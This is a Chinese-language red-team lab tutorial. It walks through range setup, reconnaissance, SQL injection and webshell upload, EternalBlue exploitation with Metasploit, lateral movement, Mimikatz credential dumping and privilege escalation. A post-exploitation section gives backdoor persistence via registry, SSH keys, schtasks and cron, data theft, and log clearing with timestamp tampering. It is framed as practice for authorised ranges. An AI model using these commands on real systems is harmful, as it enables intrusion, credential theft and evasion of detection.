免责声明:
该文章所涉及到的安全工具和技术仅做分享和技术交流学习使用,使用时应当遵守国家法律,做一位合格的白帽专家。
使用本工具的用户需要自行承担任何风险和不确定因素,如有人利用工具做任何后果均由使用者承担,本人及文章作者还有泷羽sec团队不承担任何责任
如本文章侵权,请联系作者删除
B站红队公益课:https://space.bilibili.com/350329294
学习网盘资源链接:https://pan.quark.cn/s/4079487939e8
红队靶场初相识
在网络安全的江湖中,红队靶场可是个相当关键的存在,它就像是一个专门为网络安全爱好者和从业者打造的 “秘密基地”,在这个虚拟的世界里,你可以尽情施展拳脚,模拟各种真实的网络攻击场景,锤炼自己的技能 。
对于想要踏入网络安全领域的新手来说,红队靶场是绝佳的试炼场。它能让你在没有实际风险的情况下,了解黑客常用的攻击手段,比如 SQL 注入、DDoS 攻击等,当你熟练掌握了这些攻击方式背后的原理,就能更好地理解如何去防御它们,就像你了解了敌人的招式,才能更好地见招拆招。
而对于有一定经验的安全从业者,红队靶场则是他们提升进阶的秘密武器。在这里,他们可以验证自己的新思路、新方法,不断突破自己的技术瓶颈。比如在真实的网络环境中,有些操作可能会因为各种限制而无法尝试,但在靶场里,你可以大胆探索,不用担心会造成实际的损失。
靶场搭建与环境配置
(一)靶场选择与下载
在开始搭建红队靶场之前,我们首先要选择一个合适的靶场。目前,网络上有许多优秀的红队靶场可供选择,这里为大家推荐几个常见的靶场:
VulnStack:这是一个非常受欢迎的红队实战靶场,包含了域、横向渗透、多层网络等复杂场景,网上的 writeup(技术文档,记录漏洞利用和渗透过程)也很齐全,非常适合进行实战练习,下载地址:http://vulnstack.qiyuanxuetang.net/vuln/ 。
红日靶场:同样是侧重于内网渗透的靶场,涵盖了丰富的渗透测试知识点,能帮助你系统地提升内网渗透技能 ,可以在一些安全技术论坛搜索获取下载方式。
大家可以根据自己的需求和技术水平选择合适的靶场进行下载。 下载完成后,我们就可以进入下一步,搭建靶机运行环境。
(二)虚拟机软件安装与设置
虚拟机软件是运行靶机的关键,这里我们以 VMware 为例,为大家详细介绍其安装过程和关键设置。
首先,你可以从 VMware 官网(https://www.vmware.com/cn/products/workstation-pro/workstation-pro-evaluation.html )下载安装包,下载完成后,双击安装包开始安装。安装过程中,按照以下步骤进行设置:
点击 “下一步”,进入用户协议页面,勾选 “接受许可协议中的条款”,再点击 “下一步”。
选择安装位置,建议选择磁盘空间充足的路径,然后点击 “下一步”。
在用户体验设置页面,取消勾选 “启动时检查产品更新” 和 “帮助完善 VMware Workstation Pro”,以避免不必要的干扰,接着点击 “下一步”。
选择需要创建的快捷方式,如 “桌面” 和 “开始菜单程序文件夹”,方便后续启动软件,点击 “下一步”。
点击 “安装” 开始安装,安装完成后,输入许可证密钥(如果没有密钥,也可以选择试用 30 天),点击 “完成” 即可进入 VMware 主页。
(三)靶机环境配置
网络配置:不同的靶机网络模式设置会影响到后续的渗透测试过程,常见的网络模式有 NAT 模式、桥接模式和仅主机模式 。
NAT 模式:如果你的靶机需要访问外网,同时又不想让靶机直接暴露在公网中,NAT 模式是一个不错的选择。在这种模式下,靶机通过主机的网络连接访问外网,主机充当了 NAT 服务器的角色,为靶机分配私有 IP 地址。在 VMware 中设置 NAT 模式时,只需在虚拟机设置的 “网络适配器” 中选择 “NAT 模式” 即可。
桥接模式:当你希望靶机与主机处于同一网络环境,拥有与主机相同的网络权限时,可以选择桥接模式。在桥接模式下,靶机相当于网络中的一台独立主机,直接连接到物理网络,获取与主机同一网段的 IP 地址。设置时,在虚拟机设置的 “网络适配器” 中选择 “桥接模式”,并根据实际情况选择桥接的物理网卡。
仅主机模式:仅主机模式常用于内网渗透测试场景,靶机只能与主机以及同一仅主机网络中的其他虚拟机通信,无法直接访问外网。在 VMware 中,新建仅主机网络(如 VMnet2),并设置子网 IP(如 192.168.52.0)。然后在虚拟机设置的 “网络适配器” 中选择对应的仅主机网络即可。
系统初始化:在安装好虚拟机软件并设置好网络模式后,我们需要对靶机系统进行初始化配置。
系统安装:如果下载的靶机是虚拟机镜像文件(如 ova、vmdk 等格式),可以直接在 VMware 中导入镜像文件。若需要手动安装操作系统,在虚拟机设置中选择安装来源(如 ISO 镜像文件),然后按照操作系统安装向导的提示进行安装,过程中需要设置用户名、密码、分区等信息。
系统更新:安装完成后,为了确保系统的安全性和稳定性,建议及时更新系统补丁。以 Windows 系统为例,打开 “设置” - “更新和安全”,点击 “检查更新”,下载并安装系统推送的更新。
基础软件安装:根据靶场的需求,安装一些基础软件,如用于漏洞扫描的 Nmap、用于 Web 渗透的 Burp Suite 等。以 Nmap 安装为例,在 Linux 系统中,可以通过包管理器(如 apt、yum 等)进行安装,命令如下:
Debian/Ubuntu系统
sudo apt update
sudo apt install nmap
CentOS系统
sudo yum update
sudo yum install nmap
信息收集:开启靶场探索之旅
在红队靶场中,信息收集就像是一场 “寻宝游戏” 的前期准备,只有充分了解目标的各种信息,才能找到突破防线的关键。下面,我将为大家详细介绍信息收集的各个方面。
(一)目标信息收集
IP 地址与域名获取:我们可以通过多种方式获取目标的 IP 地址和域名。对于已知域名的情况,可以使用命令行工具进行查询。在 Windows 系统中,打开命令提示符,输入 “nslookup 域名”,例如 “nslookup baidu.com”,就可以获取到该域名对应的 IP 地址 。在 Linux 系统中,使用 “host 域名” 命令也能达到同样的效果。
子域名挖掘:子域名往往是容易被忽视的薄弱环节,挖掘子域名可以扩大我们的攻击面。这里推荐几款实用的工具,如 Subfinder 和 OneForAll。Subfinder 是一款功能强大的子域名发现工具,它集成了多种数据源,可以快速发现目标的子域名。使用时,在命令行输入 “subfinder -d 目标域名”,就可以开始对子域名的挖掘。OneForAll 则是一款更加全面的子域名爆破工具,它不仅可以利用多种公开数据源,还支持自定义字典进行爆破。例如,“oneforall run -t 目标域名”,就能以较高的效率发现目标的子域名。
(二)端口与服务扫描
端口扫描是信息收集的重要环节,通过扫描目标开放的端口,我们可以了解目标主机上运行的服务,从而寻找可利用的漏洞。Nmap 是一款开源且功能强大的端口扫描工具,它支持多种扫描方式,能帮助我们快速准确地获取目标端口和服务信息。
基本扫描命令:最常用的扫描命令是 “nmap 目标 IP”,它会默认扫描目标的 1000 个常见端口,并显示开放端口及其对应的服务。例如,“nmap 192.168.1.100”,就能对 IP 为 192.168.1.100 的主机进行端口扫描。
全端口扫描:如果需要扫描目标的所有端口(共 65535 个),可以使用 “nmap -p- 目标 IP” 命令,不过这种扫描方式耗时较长,需要根据实际情况选择 。
指定端口扫描:当我们只关注某些特定端口时,可以使用 “nmap -p 端口号 1, 端口号 2,… 目标 IP” 的格式进行扫描,如 “nmap -p 80,443,22 192.168.1.100”,这样就能只扫描目标主机的 80、443 和 22 端口。
服务版本识别:Nmap 还可以识别目标端口上运行的服务版本,使用 “nmap -sV 目标 IP” 命令,就能在扫描端口的同时获取服务的详细版本信息,这对于发现已知漏洞非常有帮助。
(三)漏洞信息收集
漏洞扫描工具:漏洞扫描工具可以帮助我们快速发现目标系统中存在的已知漏洞。Nessus 是一款广泛使用的商业漏洞扫描工具,它拥有庞大的漏洞数据库,能对各种操作系统、应用程序进行全面的漏洞检测。
在使用 Nessus 时,首先需要在官网注册账号并下载安装程序,安装完成后,登录 Nessus 管理界面,创建一个新的扫描任务,输入目标 IP 地址或域名,选择相应的扫描策略,然后启动扫描。扫描完成后,Nessus 会生成详细的漏洞报告,列出发现的漏洞及其风险等级。
OpenVAS 是一款开源的漏洞扫描工具,它也具备强大的漏洞检测能力。在 Linux 系统中,可以通过包管理器安装 OpenVAS,安装完成后,使用 “openvas -start” 命令启动服务,然后通过浏览器访问 OpenVAS 的 Web 界面,创建扫描任务并进行漏洞扫描。
搜索引擎利用:除了使用漏洞扫描工具,我们还可以利用搜索引擎来收集漏洞信息。例如,在百度或谷歌中输入 “目标应用名称 漏洞”,就可能找到相关的漏洞报告和利用方法。
此外,一些专业的安全漏洞搜索引擎,如 Zoomeye 和 Shodan,也能帮助我们快速发现目标系统的安全漏洞。Zoomeye 可以对网络设备、Web 应用等进行搜索,通过设置关键词和筛选条件,能够精准地找到存在特定漏洞的目标。Shodan 则更侧重于对物联网设备的搜索,它可以发现各种联网设备的开放端口和服务信息,为我们寻找漏洞提供线索。
漏洞利用:突破防线的关键
经过前面的信息收集阶段,我们已经对目标有了较为全面的了解,接下来就是漏洞利用环节,这是突破目标防线的关键步骤。下面,我将为大家详细介绍 Web 漏洞利用和系统漏洞利用的相关知识和技巧。
(一)Web 漏洞利用
SQL 注入漏洞:SQL 注入漏洞是 Web 应用中最常见的漏洞之一,它允许攻击者通过在 Web 应用的输入参数中注入恶意 SQL 语句,从而获取、修改或删除数据库中的数据。判断一个 Web 应用是否存在 SQL 注入漏洞,我们可以采用一些简单的方法。例如,在输入参数后添加一个单引号(‘),如果页面返回 SQL 语法错误信息,那么很可能存在 SQL 注入漏洞。以一个简单的用户登录页面为例,假设其登录验证的 SQL 语句为 “SELECT * FROM users WHERE username = ’ password’”,当我们在用户名输入框中输入 “admin’ OR ‘1’=‘1”,密码随意输入,此时 SQL 语句变为 “SELECT * FROM users WHERE username = ‘admin’ OR ‘1’=‘1’ AND password = ‘$password’”,由于 “1’='1” 恒为真,所以无论密码是否正确,都能成功登录。
利用 SQL 注入漏洞,我们可以进一步获取数据库中的敏感信息,如用户账号、密码等。可以使用 SQL 语句 “SELECT column1, column2 FROM table_name” 来查询指定表中的指定列数据。还可以使用 “UNION SELECT” 语句来联合查询其他表的数据,例如 “SELECT * FROM users UNION SELECT username, password FROM admins”,这样就可以获取管理员表中的用户名和密码。
文件上传漏洞:文件上传漏洞是指 Web 应用程序对用户上传的文件没有进行严格的验证和过滤,导致攻击者可以上传恶意文件,如 WebShell,从而获取服务器的控制权。利用文件上传漏洞获取 WebShell 的过程通常如下:首先,我们需要找到 Web 应用中的文件上传点,如用户头像上传、文件附件上传等功能。然后,尝试上传一个简单的 PHP 一句话木马文件,内容为 “”。如果上传成功,并且服务器对上传的文件没有进行重命名或移动到不可执行目录,我们就可以通过访问上传的文件,使用 POST 方式传递参数 “pass”,来执行任意 PHP 代码。例如,使用 Burp Suite 抓包工具,将请求包中的 “pass” 参数设置为 “system (‘whoami’)”,就可以获取服务器当前的用户名。如果服务器对上传的文件进行了严格的验证和过滤,我们就需要采取一些绕过手段,如修改文件后缀名、使用 00 截断、绕过文件头检测等。比如,对于只允许上传图片文件的情况,我们可以将 PHP 一句话木马文件的后缀名改为.jpg,然后在文件头部添加 GIF 图片的文件头 “GIF89a”,再进行上传,这样就有可能绕过文件头检测,成功上传 WebShell。
(二)系统漏洞利用
以 MS17 - 010 永恒之蓝漏洞为例,这是一个利用 Windows 系统的 SMB 协议漏洞来获取系统最高权限的漏洞,曾在全球范围内引发了大规模的网络攻击。
利用该漏洞的步骤如下:
信息收集与漏洞确认:首先,使用 Nmap 等工具对目标主机进行端口扫描,确认目标主机的 445 端口是否开放。命令为 “nmap -sV -p 445 目标 IP”,如果 445 端口开放,且显示的服务为 SMB,那么目标主机有可能存在 MS17 - 010 漏洞。接着,使用 Metasploit Framework 工具中的辅助模块进行漏洞验证。打开 Metasploit,输入 “msfconsole” 进入控制台,然后输入 “search ms17_010” 搜索相关模块,选择 “auxiliary/scanner/smb/smb_ms17_010” 模块,使用 “show options” 查看模块选项,设置 “RHOSTS” 为目标 IP,即 “set RHOSTS 目标 IP”,最后输入 “run” 运行模块进行漏洞检测。如果检测结果显示 “host likely vulnerable to MS17 - 010”,则说明目标主机存在该漏洞。
漏洞利用:确认目标主机存在漏洞后,选择攻击模块进行利用。在 Metasploit 中,选择 “exploit/windows/smb/ms17_010_eternalblue” 模块,同样使用 “show options” 查看选项,设置 “RHOSTS” 为目标 IP,“LHOST” 为攻击者主机的 IP(用于接收反弹的 Shell),即 “set LHOST 攻击者 IP”。还需要设置攻击载荷(Payload),根据目标系统的情况选择合适的载荷,如 “windows/x64/meterpreter/reverse_tcp”,设置命令为 “set payload windows/x64/meterpreter/reverse_tcp”。设置完成后,输入 “run” 或 “exploit” 开始攻击。如果攻击成功,将会获得一个 Meterpreter Shell,此时我们就可以在目标主机上执行各种命令,如添加用户、开启远程桌面等。
在利用 MS17 - 010 永恒之蓝漏洞时,需要注意以下几点:一是确保目标主机没有安装相关的安全补丁,因为安装补丁后该漏洞将被修复,无法利用;二是在实际操作中,要遵守法律法规和道德规范,仅在合法授权的靶场环境中进行测试,严禁对未经授权的目标进行攻击;三是利用过程中可能会触发目标主机的安全防护机制,如防火墙、入侵检测系统等,需要做好应对措施,避免被发现和追踪。
内网渗透:深入靶场核心
当我们成功突破目标的外部防线,进入内网后,就来到了红队靶场中最为关键的阶段 —— 内网渗透。内网渗透就像是一场在敌人腹地的秘密行动,需要我们小心翼翼地收集信息、巧妙地进行横向移动,并逐步提升权限,最终获取目标系统的最高控制权。
(一)内网信息收集
主机信息收集:在 Windows 系统中,我们可以使用 “systeminfo” 命令来获取详细的系统信息,包括操作系统版本、补丁安装情况等。例如,执行 “systeminfo | findstr /B/C:“OS Name” /C:“OS Version””,就能快速查看到当前系统的名称和版本。还可以使用 “wmic” 命令来获取更多信息,如 “wmic service list brief” 可以列出当前系统中运行的服务,“wmic process list brief” 可以查看进程列表 。在 Linux 系统中,“uname -a” 命令可以获取内核版本、主机名等信息,“cat /etc/issue” 或 “cat /etc/* - release” 可以查看系统发行版信息。
用户信息收集:在 Windows 系统中,“net user” 命令可以查看本机用户列表,“net user /domain” 可以查看域用户。“net localgroup administrators /domain” 能查看域管理员组的成员。在 Linux 系统中,“cat /etc/passwd” 文件记录了系统中的所有用户信息,“cat /etc/group” 文件记录了用户组信息,通过分析这些文件,我们可以了解用户的权限和所属组情况 。
网络拓扑分析:使用 “ipconfig /all” 命令可以获取网络配置信息,包括 IP 地址、子网掩码、网关等。在 Linux 系统中,“ifconfig” 命令可以查看网络接口信息。还可以使用 “route print” 命令查看路由表,了解网络的路由规则。通过分析这些信息,我们可以绘制出内网的大致拓扑结构,为后续的横向移动做好准备。此外,还可以使用一些工具,如 Nmap、Fscan 等进行网络扫描,获取更详细的网络拓扑信息。例如,使用 Nmap 的 “nmap -sn -PE -n -min - parallelism 1024 -oX result.xml 192.168.1.1/24 -v” 命令,可以进行 ICMP 扫描,快速发现内网中的存活主机。
(二)横向移动
利用工具实现横向移动:PsExec 是一款强大的远程执行工具,它允许我们在其他主机上执行命令。使用时,需要知道目标主机的 IP 地址、用户名和密码。例如,在命令行中输入 “psexec \ 目标 IP -u 用户名 -p 密码 cmd”,就可以在目标主机上打开一个命令提示符窗口。不过,使用 PsExec 可能会被目标主机的安全防护软件检测到,因此在实际操作中,我们可以对 PsExec 进行免杀处理,或者使用其他类似的工具,如 WMIExec、PSEXESVC 等。
利用漏洞进行横向移动:如果内网中存在 MS17 - 010 永恒之蓝漏洞,我们可以利用这个漏洞在主机之间进行横向移动。具体操作方法与前面介绍的系统漏洞利用中利用 MS17 - 010 漏洞获取权限类似,只是在攻击时,将目标 IP 地址设置为内网中的其他主机即可。除了 MS17 - 010 漏洞,还有很多其他的漏洞可以用于横向移动,如 CVE - 2019 - 0708(BlueKeep 漏洞)、CVE - 2020 - 0796(SMBGhost 漏洞)等,我们需要根据实际情况进行分析和利用。
(三)权限提升
Windows 系统权限提升:在 Windows 系统中,我们可以利用一些工具来提升权限。Mimikatz 是一款功能强大的工具,它可以从内存中提取明文密码、哈希值等凭证信息。例如,使用 “mimikatz # privilege::debug” 命令获取调试权限,然后使用 “mimikatz # sekurlsa::logonpasswords” 命令就可以提取当前系统中登录用户的密码信息。
如果获取到了管理员的密码,就可以使用该密码登录管理员账号,从而获得更高的权限。除了 Mimikatz,还有一些其他的工具和方法可以用于 Windows 系统的权限提升,如利用系统漏洞(如 “烂土豆” 漏洞)、服务权限配置错误等。以 “烂土豆” 漏洞为例,我们可以使用相关的利用工具,如 JuicyPotato、RoguePotato 等,通过创建一个高权限的进程,从而实现权限提升。具体操作步骤如下:首先,下载并运行对应的利用工具,设置好相关参数,如指定要执行的命令或程序;然后,工具会利用漏洞创建一个高权限的进程,并执行我们指定的命令,从而使我们获得更高的权限。
Linux 系统权限提升:在 Linux 系统中,我们可以通过查找具有 SUID 权限的文件来提升权限。SUID(Set User ID)是一种特殊的文件权限,当一个可执行文件设置了 SUID 权限时,其他用户执行该文件时将拥有该文件所有者的权限。使用 “find /-perm -u = s -type f 2\u003e/dev/null” 命令可以查找系统中所有具有 SUID 权限的文件。如果发现了一些具有 SUID 权限的可执行文件,并且这些文件存在安全漏洞,我们就可以利用这些漏洞来提升权限。例如,如果发现 “/usr/bin/ping” 文件具有 SUID 权限,并且该文件存在命令注入漏洞,我们就可以通过构造特殊的命令来获取 root 权限。此外,还可以通过利用内核漏洞、计划任务等方式来提升权限。
比如,利用内核漏洞提权时,我们需要先确定目标系统的内核版本,然后查找是否存在针对该版本内核的漏洞利用程序。如果找到合适的漏洞利用程序,就可以按照程序的使用说明进行操作,尝试获取 root 权限。对于计划任务提权,我们可以查看系统中的计划任务,看是否有以 root 权限运行的任务,并且任务执行的脚本或命令存在可利用的漏洞。如果有,我们就可以通过修改脚本或命令,使其执行我们指定的恶意代码,从而实现权限提升。
后渗透阶段:巩固成果与隐藏痕迹
当我们成功完成内网渗透,获取到目标系统的关键权限后,就进入了后渗透阶段。这个阶段同样至关重要,它决定了我们能否长期有效地控制目标系统,以及是否能在不被发现的情况下获取更多有价值的信息。后渗透阶段主要包括维持权限、信息窃取与分析以及痕迹清理等关键步骤。
(一)维持权限
维持权限是后渗透阶段的首要任务,只有确保我们能够持续访问目标系统,才能进一步开展后续的操作。设置后门是维持权限的常用方法之一。在 Windows 系统中,我们可以利用注册表实现后门设置。通过修改注册表的启动项,将恶意程序添加到系统启动时自动运行的列表中。例如,我们可以在 “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run” 键值下,新建一个名为 “Backdoor” 的字符串值,将其数据设置为恶意程序的路径,这样当用户下次登录系统时,恶意程序就会自动启动,我们就可以通过该程序重新获取对系统的控制权。
在 Linux 系统中,我们可以利用 SSH 密钥对来设置后门。首先,在攻击者主机上生成 SSH 密钥对,然后将公钥添加到目标系统的 “authorized_keys” 文件中。这样,我们就可以使用对应的私钥通过 SSH 连接到目标系统,而无需输入密码,即使目标系统的管理员修改了用户密码,我们仍然可以通过这种方式访问系统。
除了设置后门,利用计划任务也是维持权限的有效手段。在 Windows 系统中,我们可以使用 “schtasks” 命令创建计划任务。例如,“schtasks /create/tn “BackdoorTask” /tr “C:\Windows\System32\cmd.exe/c C:\malware\backdoor.exe” /sc DAILY /st 03:00” 这个命令会创建一个名为 “BackdoorTask” 的计划任务,每天凌晨 3 点执行 “C:\malware\backdoor.exe” 这个恶意程序,从而确保我们能够持续控制目标系统。在 Linux 系统中,我们可以编辑 “crontab” 文件来创建计划任务。比如,在 “crontab -e” 命令打开的文件中添加 “0 3 * * * /path/to/backdoor.sh”,表示每天凌晨 3 点执行 “/path/to/backdoor.sh” 这个脚本,实现权限的维持。
(二)信息窃取与分析
在成功维持权限后,我们就可以着手窃取目标系统中的敏感信息,并对这些信息进行深入分析,以获取更多有价值的情报。敏感信息的范围非常广泛,包括用户账号、密码、数据库文件、重要文档等。在 Windows 系统中,我们可以使用 Mimikatz 工具来获取用户的登录凭证。如前文所述,使用 “mimikatz # privilege::debug” 命令获取调试权限,然后使用 “mimikatz # sekurlsa::logonpasswords” 命令就可以提取当前系统中登录用户的密码信息。如果目标系统中存在数据库,我们可以通过导出数据库文件的方式获取其中的数据。对于 MySQL 数据库,我们可以使用 “mysqldump” 命令进行备份,如 “mysqldump -u root -p database_name > backup.sql”,然后将备份文件传输到攻击者主机上进行分析。
在 Linux 系统中,我们可以通过查看 “/etc/passwd” 和 “/etc/shadow” 文件来获取用户账号和密码信息(前提是具有足够的权限)。“/etc/passwd” 文件包含了系统中所有用户的基本信息,如用户名、用户 ID、组 ID 等;“/etc/shadow” 文件则保存了用户的加密密码。虽然 “/etc/shadow” 文件中的密码是经过加密的,但我们可以将其导出,使用密码破解工具(如 John the Ripper)进行破解。
对于窃取到的信息,我们需要进行深入分析,以挖掘其中的价值。如果获取到了用户账号和密码,我们可以尝试使用这些凭证登录其他相关系统,扩大我们的控制范围。如果获取到了数据库文件,我们可以使用数据库管理工具(如 MySQL Workbench、pgAdmin 等)打开文件,查看其中的数据,寻找可能存在的敏感信息,如客户资料、财务数据等。
(三)痕迹清理
在完成权限维持和信息窃取后,我们必须重视痕迹清理工作。因为一旦我们的操作痕迹被发现,目标系统的管理员就会采取相应的措施,如修复漏洞、更改密码、加强安全防护等,这将导致我们失去对目标系统的控制,甚至可能面临法律风险。在 Windows 系统中,我们可以使用 “wevtutil” 命令来清理事件日志。例如,“wevtutil cl Application” 命令可以清除应用程序日志,“wevtutil cl System” 命令可以清除系统日志,“wevtutil cl Security” 命令可以清除安全日志。我们还可以通过修改注册表来删除一些操作记录,如删除最近打开的文件记录、删除访问过的网络共享记录等。在 Linux 系统中,我们可以通过删除 “/var/log” 目录下的相关日志文件来清理操作痕迹,如 “rm -f /var/log/auth.log” 可以删除认证日志,“rm -f /var/log/syslog” 可以删除系统日志。需要注意的是,在删除日志文件时,要确保不会影响系统的正常运行,有些系统可能依赖日志文件进行故障排查和安全审计,如果随意删除可能会引起管理员的注意。
除了清理日志文件,我们还可以采取一些措施来隐藏自己的行踪,如修改文件的访问时间和修改时间,使其看起来与正常文件无异。在 Windows 系统中,可以使用 “attrib” 命令来修改文件属性,在 Linux 系统中,可以使用 “touch” 命令来修改文件的时间戳。